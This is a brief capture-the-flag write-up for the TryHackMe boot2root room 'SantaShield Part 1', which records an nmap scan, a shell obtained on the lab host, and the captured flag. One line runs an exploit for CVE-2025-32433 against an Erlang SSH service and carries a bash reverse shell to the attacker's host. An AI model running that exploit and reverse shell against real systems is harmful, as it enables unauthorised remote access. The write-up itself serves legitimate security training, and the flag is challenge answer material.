SantaShield Part 1

Challenge Name:

SantaShield Part 1

Category:

Boot2Root

Challenge Description:

Vigtignissen fører sig frem med sit nye nissekonsulenthus SantaShield Security, men mon han har nisset i det, eller er der mon styr på sagerne?

https://tryhackme.com/room/santashieldsecurity2o25

Approach

└─$ sudo nmap -sC -sV -O -p- cybershield.nc3
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 46c6f8c2ce1e86b98d0ee2c5a51697a0 (ECDSA)
|_  256 a48713861f6cc22dbc6bdb4c83a57aa7 (ED25519)
80/tcp   open  http    Apache httpd 2.4.65 ((Debian))
|_http-title: Security Company Blog | Software Vulnerability Awareness
|_http-server-header: Apache/2.4.65 (Debian)
2222/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-Erlang/5.1.4.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
python3 cve-2025-32433.py cybershield.nc3 -p 2222 -c 'bash -i >& /dev/tcp/{MY-IP}/1337 0>&1'

user@debian:/opt/ssh$ whoami
whoami
user

Next part continues here

Flag

NC3{flag1:m3rRy_pwN1N9_Th4t_Cv3}

Reflections and Learnings